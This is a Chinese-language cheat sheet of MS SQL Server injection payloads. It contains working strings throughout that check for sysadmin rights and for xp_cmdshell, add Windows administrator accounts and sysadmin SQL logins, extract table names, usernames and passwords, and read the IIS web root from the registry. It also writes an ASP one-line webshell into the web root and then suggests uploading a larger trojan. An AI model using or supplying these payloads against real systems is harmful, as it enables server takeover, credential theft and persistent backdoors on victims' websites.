MS SQL 注入总结

1.
    and 1=1

    and 1=2

2. and user>0

    and db_name()>0

    and @@version>0

    and 1=(select IS_SRVROLEMEMBER('sysadmin'))

    and 'sa'=(select system_user)

    and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')

    and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regread')

    and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_makewebtask')

3. xp_cmdshell?

   ;EXEC master..xp_cmdshell "net user lee 123456 /add"--

   ;EXEC master..xp_cmdshell "net localgroup administrators lee /add"--

   ;Backup database db_name to disk='c:\inetpub\wwwroot\save.db'--

4.       ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'--

;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','@dllname'-- //没有xplog70.dll也可以

   ;EXEC master.dbo.sp_addlogin test,test--

   ;EXEC master.dbo.sp_addsrvrolemember test,sysadmin--

   ;EXEC master.dbo.sp_password test,123456,test--

   ;EXEC master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'--

  

5. and (Select top 1 name from (select top N id,name from sysobjects where xtype=‘u’ order by id) T order by id desc)>0        //表名

   and 1<(select top 1 col_name(object_id(‘表名’),N) from sysobjects)    //列名

   and (select top 1 name from (select top N id,username from 表名 order by id) T order by id desc)>0 //用户

   and (select password from 表名 where username=‘XX’)>0   //密码

6. ;create table jm_tmp(value nvarchar(4000) null,data nvarchar(4000) null)--

   ;insert jm_tmp exec master.dbo.xp_regread

'HKEY_LOCAL_MACHINE','SYSTEM\controlset001\services\w3svc\parameters\virtual             roots','/'--     (2000 server)

   ;and 1=(select top 1 cast[data] as nvarchar(4000) + char(124) from [jm_tmp] order by [data] desc)

   ;drop table jm_tmp--

   ;create table [dbo].[lee] ([test][char](255));--

   ;DECLARE @result varchar(255) EXEC master.dbo.xp_regread            'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into lee (test) values( @result );--

   and 1=(select count(*) from lee where test >1)

   ;drop table lee--

7. 写一个简单木马到服务器：先创建一个表，在把木马文件添加到表里，使用sp_makewebtask把表导成一个ASP木马文件EXECUTE        sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp'，@query = 'SELECT 你的字段 FROM 你建的临时表'，如

;create table lee(test nvarchar(4000))--

;insert into lee(test) values ('<%eval request("a")%>') --//一句话木马

;EXECUTE sp_makewebtask @outputfile ='E:\Project\攻防\SQL注入\漏洞程序\dvbbs6.0.0\test.asp', @query = 'SELECT test FROM lee' --

;drop table lee--

     直接写一个简易木马到WEB绝对路径（可以由xp_regread来获取）下：

    ;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',

     @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\test.asp',

     1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%dim objFSO%>'--

    ——在WEB绝对路径下创建一个test.asp文件，并写入一句<%dim objFSO%>

   ;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',

@o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\inetpub\wwwroot\test.asp',  

8         exec @ret = sp_oamethod @f, 'writeline', NULL, '<%dim fdata%> '—

写的时候要把%换成%25

——用同样的方法把木马程序所有的语句写到test.asp文件中。再利用test.asp上传一个功能强大的木马文件，比如海阳2006